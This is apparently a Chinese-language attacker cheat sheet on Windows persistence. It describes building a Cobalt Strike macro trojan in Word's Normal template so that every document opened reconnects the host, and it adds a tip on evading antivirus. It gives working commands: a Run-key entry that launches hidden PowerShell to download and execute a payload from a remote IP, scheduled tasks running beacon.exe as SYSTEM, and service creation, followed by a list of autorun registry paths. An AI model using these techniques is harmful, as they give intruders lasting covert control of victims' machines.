权限维持新老技术
参考资料
静默宏木马
可以使用静默宏木马进行权限维持。利用cs创建宏木马插入docx文件中。
制作方法
1.利用CS生成vbs代码
2.创建一个docx文档并创建宏且将宏的位置设置为对所有的活动模版和文档,如下图所示
3.将恶意vbs代码加入到Nomal的This Document模块
4.保存文件并运行,主机上线,且以后这个电脑上的任意word文档打开后都会上线,除非删掉这个宏配置。
tips
杀软对doc文件杀软查杀力度远大于对docx文件的。
启动项添加
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v “Keyname” /t REG_SZ /d “powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://172.16.99.148:80/a1’))”” /f
计划任务
#登录时运行
SchTasks /Create /SC ONLOGON /TN “hacker” /ru “system” /tr “C:\Users\Administrator\Desktop\beacon.exe”
#每分钟运行一次
schtasks /create /sc minute /mo 1 /tn “hacker” /ru “system” /tr “C:\Users\Administrator\Desktop\beacon.exe”
创建服务
sc create HelloWindowsService binpath= “C:\Program Files\1.exe” start= system displayname= “HelloWindowsService”
附录
常用注册表路径
用户级
\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
系统级
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce